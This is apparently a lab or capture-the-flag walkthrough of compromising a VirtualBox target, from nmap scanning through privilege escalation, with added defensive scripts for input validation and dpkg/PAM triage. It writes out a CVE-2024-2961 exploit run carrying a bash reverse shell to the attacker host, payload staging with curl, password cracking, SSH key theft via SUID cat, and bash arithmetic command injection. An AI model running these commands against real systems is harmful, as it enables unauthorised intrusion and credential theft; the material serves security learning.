This article was last updated 71 days ago; the information in it may be out of date. If you spot an error, email big_fw@foxmail.com.
1. Information Gathering
┌──(kali㉿kali)-[~/Desktop]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:ea:4f:b2 brd ff:ff:ff:ff:ff:ff
inet 192.168.20.32/24 brd 192.168.20.255 scope global dynamic noprefixroute eth0
valid_lft 3578sec preferred_lft 3578sec
inet6 fe80::3be4:3e0e:f3f2:8fe1/64 scope link noprefixroute
valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sn 192.168.20.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-01 04:12 EDT
Nmap scan report for 192.168.20.31 (192.168.20.31)
Host is up (0.00019s latency).
MAC Address: 08:00:27:8C:4C:C6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.20.229 (192.168.20.229)
Host is up (0.030s latency).
MAC Address: 1E:A3:33:FC:CE:96 (Unknown)
Nmap scan report for 192.168.20.253 (192.168.20.253)
Host is up (0.00015s latency).
MAC Address: 38:D5:7A:E0:D5:C1 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.20.32 (192.168.20.32)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.54 seconds
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -p- 192.168.20.31
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-01 04:12 EDT
Nmap scan report for 192.168.20.31 (192.168.20.31)
Host is up (0.00029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 08:00:27:8C:4C:C6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.36 seconds
2. Foothold
Step 0: port 8080 serves a PHP application. cnext-exploit.py (from the cnext-exploits repository, which targets the glibc iconv bug CVE-2024-2961 through PHP filter chains) is run against index.php with a bash reverse-shell payload; the shell is caught with rlwrap nc -lvp 4444 on the attacker host.
┌──(kali㉿kali)-[~/Desktop]
└─$ cd cnext-exploits-main
┌──(kali㉿kali)-[~/Desktop/cnext-exploits-main]
└─$ vim cnext-exploit.py
┌──(kali㉿kali)-[~/Desktop/cnext-exploits-main]
└─$ /opt/p/bin/python3 cnext-exploit.py http://192.168.20.31:8080/index.php "/bin/bash -c 'bash -i >& /dev/tcp/192.168.20.32/4444 0>&1'"
[*] The data:// wrapper works
[*] The php://filter/ wrapper works
[*] The zlib extension is enabled
[+] Exploit preconditions are satisfied
[*] Using 0x7f0b5e400040 as heap
EXPLOIT SUCCESS
rlwrap nc -lvp 4444
Step 1: stage linpeas.sh on the attacker host over HTTP.
┌──(kali㉿kali)-[~/Desktop/cnext-exploits-main]
└─$ cd /tmp
┌──(kali㉿kali)-[/tmp]
└─$ locate linpeas
/home/kali/.cache/vmware/drag_and_drop/LpKrwZ/linpeas.sh
/home/kali/.cache/vmware/drag_and_drop/iSaXWh/linpeas.sh
/usr/share/powershell-empire/empire/server/modules/python/situational_awareness/host/multi/linpeas.yaml
┌──(kali㉿kali)-[/tmp]
└─$ cp /home/kali/.cache/vmware/drag_and_drop/LpKrwZ/linpeas.sh .
┌──(kali㉿kali)-[/tmp]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.20.31 - - [01/May/2025 04:15:26] "GET /linpeas.sh HTTP/1.1" 200 -
Step 2: on the target, wget is missing but curl is available; linpeas is fetched and sourced. Among its findings is a world-readable /etc/shadow.bak.
www-data@f094e0959a50:/tmp$ wget -h
wget -h
bash: wget: command not found
www-data@f094e0959a50:/tmp$ curl -h
curl -h
Usage: curl [options...] <url>
-d, --data <data> HTTP POST data
-f, --fail Fail fast with no output on HTTP errors
-h, --help <category> Get help for commands
-i, --include Include protocol response headers in the output
-o, --output <file> Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
-s, --silent Silent mode
-T, --upload-file <file> Transfer local FILE to destination
-u, --user <user:password> Server user and password
-A, --user-agent <name> Send User-Agent <name> to server
-v, --verbose Make the operation more talkative
-V, --version Show version number and quit
This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".
www-data@f094e0959a50:/tmp$ curl http://192.168.20.32/linpeas.sh -o linpeas.sh
< curl http://192.168.20.32/linpeas.sh -o linpeas.sh
source ./linpeas.sh
......
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 138 Mar 27 2023 /usr/lib/systemd/system/dpkg-db-backup.timer
-rw-r--r-- 1 root root 147 Mar 27 2023 /usr/lib/systemd/system/dpkg-db-backup.service
-rwxr-xr-x 1 root root 2569 May 11 2023 /usr/libexec/dpkg/dpkg-db-backup
-rw-r--r-- 1 root root 568 Apr 26 08:09 /etc/shadow.bak
-rw-r--r-- 1 root root 0 Apr 8 2024 /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/dpkg-db-backup.timer
-rw-r--r-- 1 root root 61 Apr 8 2024 /var/lib/systemd/deb-systemd-helper-enabled/dpkg-db-backup.timer.dsh-also
.........
Step 3: the hash copied out of /etc/shadow.bak is run through john with rockyou. The first run reports "No password hashes left to crack" because the hash was already cracked and stored in john's pot file; --show (on its own, without --format/--wordlist) prints the result: pretend:pretend.
┌──(kali㉿kali)-[~/Desktop]
└─$ cd /tmp
┌──(kali㉿kali)-[/tmp]
└─$ vim hash
┌──(kali㉿kali)-[/tmp]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
No password hashes left to crack (see FAQ)
┌──(kali㉿kali)-[/tmp]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt --show hash
Invalid options combination: "--show"
┌──(kali㉿kali)-[/tmp]
└─$ john --show hash
pretend:pretend:20204::::::
1 password hash cracked, 0 left
pretend:pretend
Step 4: su to pretend. The home directory is owned by root and holds a SUID-root copy of cat executable by group pretend, next to a .ssh directory owned by uid 1000 with mode 0700. The SUID cat reads .ssh/id_rsa regardless of that mode.
www-data@f094e0959a50:/tmp$ su pretend
su pretend
Password: pretend
id
uid=999(pretend) gid=999(pretend) groups=999(pretend)
cd ~
ls -al
total 56
drwxr-xr-x 3 root root 4096 Apr 26 08:29 .
drwxr-xr-x 1 root root 4096 Apr 26 08:05 ..
drwx------ 2 1000 1000 4096 Apr 26 08:44 .ssh
-rwsr-x--- 1 root pretend 44016 Apr 26 08:29 cat
./cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
Step 5: ssh-keygen -y refuses the key file while it is 0664; after chmod 600 it prints the public key, whose comment welcome@moban gives the user name. The key logs in over SSH as welcome.
┌──(kali㉿kali)-[/tmp]
└─$ vim id_rsa
┌──(kali㉿kali)-[/tmp]
└─$ ssh-keygen -y -f id_rsa > id_rsa.pub
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
┌──(kali㉿kali)-[/tmp]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[/tmp]
└─$ ssh-keygen -y -f id_rsa > id_rsa.pub
┌──(kali㉿kali)-[/tmp]
└─$ cat id_rsa.pub
ssh-rsa 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 welcome@moban
┌──(kali㉿kali)-[/tmp]
└─$ ssh welcome@192.168.20.31 -i id_rsa
The authenticity of host '192.168.20.31 (192.168.20.31)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:46: [hashed name]
~/.ssh/known_hosts:48: [hashed name]
~/.ssh/known_hosts:49: [hashed name]
~/.ssh/known_hosts:50: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.20.31' (ED25519) to the list of known hosts.
Linux gc 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 30 06:30:02 2025 from 192.168.20.253
welcome@gc:~$
Step 6: welcome may run /think/Task_Scheduler.sh as think via sudo without a password. The "invalid arithmetic operator" errors below show that the priority input is evaluated in a bash arithmetic context, so an array subscript containing a command substitution, a[$(...)], executes that command as think before any range check.
welcome@gc:~$ sudo -l
Matching Defaults entries for welcome on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on localhost:
(think) NOPASSWD: /bin/bash /think/Task_Scheduler.sh
welcome@gc:~$ sudo -u think /bin/bash /think/Task_Scheduler.sh
+ Task Scheduler +
Please enter the task priority (1-10): a[$(bash -p)]
Please enter the estimated CPU usage (in percentage, 0-100):
Please enter the estimated memory usage (in MB):
think@gc:/home/welcome$
welcome@gc:~$ sudo -u think /bin/bash /think/Task_Scheduler.sh
+ Task Scheduler +
Please enter the task priority (1-10): a[$(cat /think/pass.txt)]
Please enter the estimated CPU usage (in percentage, 0-100):
Please enter the estimated memory usage (in MB):
/think/Task_Scheduler.sh: line 14: think@thinkyouare: syntax error: invalid arithmetic operator (error token is "@thinkyouare")
/think/Task_Scheduler.sh: line 15: think@thinkyouare: syntax error: invalid arithmetic operator (error token is "@thinkyouare")
Task Resource Requirements:
Adjusted CPU Usage: %
Adjusted Memory Usage: MB
Total Resource Consumption: 0
welcome@gc:~$ su think
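The source of /think/Task_Scheduler.sh is not on the page, but the error messages above ("syntax error: invalid arithmetic operator") show the priority being used in a bash arithmetic context, which is exactly what makes a[$(bash -p)] run. The script below is an added example, not the machine's script or the author's code: it reproduces that bug class in a vulnerable range check and sets the hardened form beside it. The function names, the 1-10 range and the marker-file payload are assumptions made for the demonstration.

```bash
#!/usr/bin/env bash
# Added example: reproduces the bug class behind /think/Task_Scheduler.sh
# (the real script is not shown on the page). Function names are mine.

# VULNERABLE: the untrusted value goes straight into an arithmetic context.
# bash evaluates a variable's string value as an expression, and an array
# subscript a[...] is expanded first, so an input such as
#   a[$(some command)0]
# runs "some command" with the privileges of whoever runs the script,
# before the comparison happens. (( )), $(( )), let, declare -i and
# [[ $x -gt 10 ]] are all affected in the same way.
vulnerable_priority_check() {
    local priority="$1"
    if (( priority < 1 || priority > 10 )); then
        echo "invalid"
        return 1
    fi
    echo "ok"
}

# HARDENED: accept only one or two ASCII digits before any arithmetic is
# attempted, and force base 10 so "08" is not rejected as a bad octal literal.
safe_priority_check() {
    local priority="$1"
    if [[ ! $priority =~ ^[0-9]{1,2}$ ]]; then
        echo "invalid"
        return 1
    fi
    if (( 10#$priority < 1 || 10#$priority > 10 )); then
        echo "invalid"
        return 1
    fi
    echo "ok"
}

# Demonstration: the payload creates a marker file when the check is
# injectable, and is rejected outright by the hardened version.
demo() {
    local marker payload
    marker=$(mktemp -u)                 # -u: fresh path only, file not created
    payload="a[\$(touch $marker)0]"     # assumed payload, same shape as a[$(bash -p)]

    vulnerable_priority_check "$payload" >/dev/null 2>&1 || true
    if [ -e "$marker" ]; then
        echo "vulnerable_priority_check: payload executed (marker file created)"
        rm -f "$marker"
    fi

    safe_priority_check "$payload" >/dev/null 2>&1 || true
    if [ ! -e "$marker" ]; then
        echo "safe_priority_check: payload rejected, nothing executed"
    fi
}

# Run the demo only when executed directly, not when sourced.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    demo
fi
```

The validation has to happen before the value reaches any arithmetic construct; a test such as [[ $priority -gt 10 ]] is itself an arithmetic context and would already have run the payload.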
Step 7: dpkg -V lists packaged files whose md5sum no longer matches the package. Entries marked c are conffiles and are expected to drift; /bin/su has no such mark, and /etc/pam.d/su has changed as well. The PAM rule pair means: if the target user is root, evaluate the next line, which is sufficient when the calling uid (use_uid) is think, so think can authenticate as root without a password. The replaced su, however, answers "you are not think" and no longer accepts -c, which the real su does.
think@gc:/home/welcome$ dpkg -V
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
??5?????? /bin/su
??5?????? c /etc/pam.d/su
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.conf for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.conf
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.motd for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.motd
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.rules for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.rules
dpkg: warning: packagekit: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla for hash: Permission denied
think@gc:/home/welcome$ grep -B 1 think /etc/pam.d/su
auth [success=ignore default=1] pam_succeed_if.so user = root
auth sufficient pam_succeed_if.so use_uid user = think
think@gc:/home/welcome$ su root
you are not think
think@gc:/home/welcome$ su root -c "id"
su: invalid option -- 'c'
Try 'su --help' for more information.
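Two triage checks a responder would want for the findings above, as an added example that is not from the page: the first parses dpkg -V output and reports changed files that are not conffiles (a modified /bin/su has no legitimate explanation, whereas edited configuration under /etc routinely shows up); the second scans a PAM service file for "auth sufficient pam_succeed_if.so ... use_uid" rules, which pass authentication for a named calling user without a password. The sample dpkg -V lines and the sample /etc/pam.d/su are constructed, modelled on the output above and on Debian's stock su file; function names are mine.

```bash
#!/usr/bin/env bash
# Added example, not from the page: triage helpers for the dpkg -V and
# /etc/pam.d/su findings. Function names and sample data are mine.

# dpkg -V record format: nine verification characters, an optional "c"
# (conffile) attribute, then the path. Character 3 is the md5sum check;
# "5" means the file content no longer matches what the package shipped.
# Reads dpkg -V output on stdin and prints changed files that are NOT conffiles.
modified_non_conffiles() {
    local flags attr rest
    while read -r flags attr rest; do
        case "$flags" in
            "dpkg:"*) continue ;;            # warning lines, not records
        esac
        [[ ${#flags} -eq 9 ]] || continue
        [[ ${flags:2:1} == "5" ]] || continue
        if [[ $attr == "c" ]]; then
            continue                          # conffile: local edits are expected
        fi
        # No attribute column: the path began in the second field.
        if [[ -n $rest ]]; then
            printf '%s\n' "$attr $rest"       # path contained whitespace
        else
            printf '%s\n' "$attr"
        fi
    done
}

# Reads a PAM service file on stdin and prints auth rules that make
# authentication "sufficient" based on the *calling* user's uid
# (pam_succeed_if with use_uid). On this box such a rule lets think
# su to root with no password at all.
pam_uid_bypass_rules() {
    local line
    while IFS= read -r line; do
        if [[ $line =~ ^[[:space:]]*(#|$) ]]; then
            continue                          # comment or blank line
        fi
        if [[ $line =~ ^[[:space:]]*auth[[:space:]]+sufficient[[:space:]]+pam_succeed_if\.so ]] \
           && [[ $line == *use_uid* ]]; then
            printf '%s\n' "$line"
        fi
    done
}

# Constructed sample, modelled on the dpkg -V output shown above.
SAMPLE_DPKG_V='??5?????? c /etc/apache2/apache2.conf
??5?????? c /etc/sudoers
??5??????   /bin/su
??5?????? c /etc/pam.d/su
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
..?......   /usr/bin/passwd'

# Constructed sample /etc/pam.d/su: Debian'"'"'s pam_rootok line plus the
# two lines found by the grep above.
SAMPLE_PAM_SU='# su service, sample only
auth       sufficient pam_rootok.so
auth       [success=ignore default=1] pam_succeed_if.so user = root
auth       sufficient pam_succeed_if.so use_uid user = think
@include common-auth
@include common-account'

demo() {
    echo "Changed files that are not conffiles:"
    printf '%s\n' "$SAMPLE_DPKG_V" | modified_non_conffiles
    echo "auth rules that are sufficient on the caller's uid:"
    printf '%s\n' "$SAMPLE_PAM_SU" | pam_uid_bypass_rules
}

# Run the demo only when executed directly, not when sourced.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    demo
fi
```

On a live host, source the file and run dpkg -V 2>/dev/null | modified_non_conffiles and pam_uid_bypass_rules < /etc/pam.d/su. dpkg -V can only hash files the caller can read, which is why the run above as think produced "Permission denied" warnings for /etc/sudoers; repeat it as root (or from a trusted rescue environment) to get a complete list.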
3. Privilege Escalation
PROMPT_COMMAND is executed by an interactive bash before it prints each prompt, so exporting it and invoking the replaced su is a cheap probe: the first id output below comes from a shell running as uid 0 inside su, then su prints its refusal, and the final id is printed by think's own shell.
think@gc:/home/welcome$ export PROMPT_COMMAND="id"
uid=1001(think) gid=1001(think) groups=1001(think)
think@gc:/home/welcome$ su root
uid=0(root) gid=0(root) groups=0(root)
you are not think
uid=1001(think) gid=1001(think) groups=1001(think)